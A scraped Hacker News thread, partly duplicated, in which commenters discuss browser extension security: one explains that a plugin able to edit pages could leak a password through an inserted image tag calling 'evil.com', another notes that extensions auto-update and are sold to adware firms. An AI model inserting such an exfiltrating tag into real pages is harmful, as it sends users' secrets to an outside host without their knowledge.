undefined | Better HN

0 pointsmichaelt8y ago0 comments

Even if the plugin couldn't phone home directly, if they have the power to change the HTML of the page, they can insert <img src="http://evil.com/phonehome?yourpassword=whatever"> and phone home that way. There's no permission that lets a plugin modify pages while preventing it from inserting tags that cause new requests.

The plugin's code is probably quite short - maybe you could inspect it yourself, manually?

0 comments

iza8y ago

Problem is extensions silently update in the background. They are frequently sold to adware companies, then malicious scripts added in without the user's knowledge.

j / k navigate · click thread line to collapse

0 pointsmichaelt8y ago0 comments

The plugin's code is probably quite short - maybe you could inspect it yourself, manually?

0 comments

iza8y ago

Problem is extensions silently update in the background. They are frequently sold to adware companies, then malicious scripts added in without the user's knowledge.

j / k navigate · click thread line to collapse